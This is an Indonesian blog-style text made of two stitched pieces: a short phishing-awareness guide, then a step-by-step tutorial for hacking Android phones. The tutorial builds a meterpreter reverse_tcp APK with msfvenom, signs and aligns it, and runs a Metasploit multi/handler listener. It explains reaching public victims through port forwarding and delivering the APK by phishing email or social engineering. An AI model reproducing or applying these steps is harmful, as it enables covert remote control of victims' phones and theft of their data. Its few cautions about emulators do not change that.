Figure 1. Phising.

 Phishing adalah salah satu teknik penipuan yang masih sering terjadi di internet. Umumnya phishing ini dilakukan dengan mengirimkan email atau sebuah link website yang seolah-olah penting dan resmi, terus meminta kita menginput data-data pribadi kita. Terus nanti data pribadi tersebut dicuri, yang akibatnya bisa merugikan kita secara finansial.

Contohnya misalnya saya dapat email yang bilang bahwa saya baru saja memenangkan undian Iphone. Nah untuk mengirimkan iphone tersebut saya diminta menginput data-data pribadi saya. Kalo dapat email atau pesan seperti ini, please jangan di klik. Teknik ini sering memberikan tawaran atau iming-iming hadiah yang menggiurkan

Contoh lainnya misalnya saya mendapat email super penting dari bank X, bahwa rekening saya ada masalah, dan akan diblok, supaya akun saya tidak diblokir, saya harus menginput data-data pribadi saya segera. Teknik ini biasanya bersifat super penting, dan harus segera direspon

Ciri lainnya kita mendapat link sebuah website yang sudah dimodifikasi, sangat mirip dengan link aslinya, padahal palsu. Contohnya dulu pernah ada kasus web klikbca.com; ada orang yang mendaftarkan alamat palsu clickbca.com, klickbca.com dst

Selain itu bisa juga dalam bentuk attachment email yang mencurigakan, atau email dari pengirim yang mencurigakan.

Ada banyak lagi teknik phishing. Info lebih lengkapnya bisa dilihat pada link berikut ini:

https://www.phishing.org/

https://blog.google/topics/safety-security/protect-your-google-account-with/

Cara agar aman dari phising adalah.

1. Kenali linknya biasanya linknya apabila acak-acakan berarti palsu atau istilahnya tidak ada tingkat keamanannya

2. Jangan asal klik link, jika kita klik link itu akan terindeks atau terekspos datanya ke server yang sudah di klik biasanya bagi orang pihak ketiga biasanya akan membuat tampilan semirip mungkin sehingga korban akan mengisi data tersebut tanpa berhati-hati

3. Pastikan juga website tersebut sudah memiliki sertifikat ssl atau website tersebut sudah bisa menggunakan protocol https

4. Selalu update web browser pada android, ios dan juga windows 

5. Dan hati-hati jika dimintai data pribadi seperti email, nama, nomor kependudukan dsb

Terima kasih.

Ilham

    Ringkasan

    Pada hari ini dalam senggang, kita akan mempelajari cara meretas perangkat seluler Android menggunakan MSFvenom dan kerangka Metasploit. Kami akan menggunakan MSFvenom untuk menghasilkan payload, menyimpannya sebagai file .apk dan menyiapkan listener untuk kerangka Metasploit. Setelah pengguna / korban mengunduh dan menginstal .apk berbahaya, penyerang dapat dengan mudah mendapatkan kembali sesi di Metasploit. Untuk melakukannya, penyerang perlu melakukan manipulasi psikologis untuk memasang .apk di perangkat seluler korban.

Kami akan mendemonstrasikan ini dengan menggunakan alat-alat berikut

– Kali Linux bisa di vmware / virtualbox

– Perangkat / emulator Android

– Zipalign

– VMware atau VirtualBox (lingkungan virtual)

Setelah penyiapan berikut dikonfirmasi tanpa kesalahan, maka kami siap.

Step 1: Menjalankan Kali Linux
Sebelum kita mulai, mari kita bahas tentang MSFvenom. Ini adalah kombinasi dari MSFpayload dan MSFencode. Alat-alat ini sangat berguna untuk menghasilkan payload dalam berbagai format dan mengenkode payload ini menggunakan berbagai modul encoder.
Menggabungkan kedua alat ini menjadi satu alat sangatlah masuk akal. Ini menstandarkan opsi baris perintah, mempercepat sedikit dengan menggunakan satu contoh kerangka kerja dan menangani semua format keluaran yang mungkin. MSFvenom digunakan untuk membuat payload menembus emulator Android.
Dengan menggunakan MSFvenom, kami membuat file .apk muatan. Untuk ini, kami menggunakan perintah berikut:
Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP  LPORT=LocalPort R > android_shell.apk

Figure 1: MSFvenom payload 

• -p — Payload to be used

• LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)

• LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)

• R — Raw format (we select .apk)

• Location — To save the file

Note: Dalam perintah ini, kami telah menggunakan alamat lokal karena kami mendemonstrasikan di lingkungan lokal. Untuk tampil di jaringan publik, Anda harus memasukkan alamat publik Anda di LHOST dan mengaktifkan penerusan port di router.
Setelah perintah ini, sekarang Anda dapat mencari file Anda di desktop dengan nama android_shell.apk.

Figure 2: APK file sudah dibuat

Setelah kami berhasil membuat file .apk, kami perlu menandatangani sertifikat karena perangkat seluler Android tidak diizinkan untuk memasang aplikasi tanpa sertifikat yang ditandatangani dengan benar. Perangkat Android hanya memasang file .apk bertanda tangan / sign certificate.
Dibutuhkan sign certificate .apk file secara manual di kali linux :

• Keytool (preinstalled)

• jar signer (preinstalled)

• zipalign (need to install)

Untuk install sign certificate pada .apk kita maka gunakan perintah sebagai berikut
Terminal: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Figure 3: Keytool

Lalu gunakan perintah dibawah sebagai berikut
Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Figure 4: Install jarsigner .apk 

Selanjutnya adalah gunakan terminal dibawah
Terminal : jarsigner -verify -verbose -certs android_shell.apk

Figure 5: Verifikasi.apk menggunakan JARsigner

Apabila belum install zipalign maka harus diinstall dulu dengan perintah seperti gambar dibawha

Figure 6: Instalasi Zipalign

Lalu gunakan perintah zipalign terhadap .apk yang sudah di buat tadi 
Terminal: zipalign -v 4 android_shell.apk singed_jar.apk

Figure 7: Verifikasi the .apk menggunakan Zipalign

Sekarang kami telah berhasil menandatangani file android_shell.apk kami dan dapat dijalankan di lingkungan Android apa pun. Nama file baru kami adalah singed_jar.apk setelah verifikasi dengan Zipalign.

Figure 8: .apk target sudah terinstall

Tahap selanjutnya adalah menggunakan aplikasi metasploit untuk generate payload nya
Terminal: msfconsole

Figure 9: Starting Metasploit

Metasploit begins with the console.

Figure 10: Tampilan Metasploit

Sekarang luncurkan atau jalankan exploit multi/handler dan gunakan android payload untuk bisa mendapatkan isi dari targetnya atau bisa dikontrol menggunakan metasploit.
Terminal: use exploit/multi/handler

Figure 11: Setup exploit

Selanjutnya, setel opsi untuk payload, IP listener (LHOST) dan listener PORT (LPORT). Kami telah menggunakan IP localhost, nomor port 4444 dan payload android / meterpreter / reverse_tcp saat membuat file .apk dengan MSFvenom.
Note : Untuk alamat ip disesuaikan alamat ip dari hp target atau harus dalam satu jaringan sebagai contoh menggunakan Wifi untuk mengetahui alamat ip dari target silahkan gunakan aplikasi Ip-checker dsb

Figure 12: Setup the exploit

Kemudian kita berhasil menjalankan exploit untuk reverse connection.
Terminal: run

Figure 13: Eksekusi exploit

Selanjutnya, kita perlu menginstal file .apk Android yang berbahaya ke perangkat seluler korban. Di lingkungan kami, kami menggunakan perangkat Android versi 8.1 (Oreo). Penyerang dapat membagikan APK Android berbahaya kepada korban dengan bantuan rekayasa sosial / phishing email.
Sekarang saatnya menyiapkan emulator Android dengan cepat (jika Anda tidak memiliki perangkat Android). Langkah-langkah untuk mengonfigurasi emulator Android:
Unduh file gambar untuk proyek kode Android x86 dari situs proyek Google Code (https://code.google.com/archive/p/android-x86/downloads)
Buat mesin virtual menggunakan kernel versi 2.6x lain di workstation VMware
Pasang file ISO ke opsi VMware
Selesaikan proses dan jalankan mesin dalam mode LIVE
Siapkan perangkat Android
Siapkan akun Google
Catatan: Proyek Android x86 dapat menghubungkannya ke jaringan lokal dengan adaptor Ethernet (VMnet8). Jika Anda menggunakan emulator lain untuk menembus perangkat Android, Anda juga dapat menggunakan emulator Android CLI.
Setelah mengatur emulator Android di VM, kami akan mengunduh file dari tautan cloud yang telah kami buat di Kali Linux dan dikirim melalui email ke akun korban.

Figure 14: Spam email

Download file yang tadi .apk yang sudah kita buat lalu install kan pada Android tapi disarankan jangan hp langsung, gunakan emulator untuk pengujian.

Figure 15: Download file .apk

Jalankan .apk tersebut

Figure 16: Install aplikasi .apk

Jika sudah di install pada target maka kita kembali lagi ke kali linux
Kita bisa lihat target sudah bisa masuk pada gambar dibawah

Figure 17: Target

Untuk mengetahui target gunakan perintah ? atau help command, kamu akan melihat banyak perintah yang bisa digunakan untuk target
Note : Gunakan Aplikasi ini pada emulator seperti nox, bluestack dsb. dikarenakan akan terdampak bahaya apabila digunakan langsung pada hp android.
terima kasih 
sekian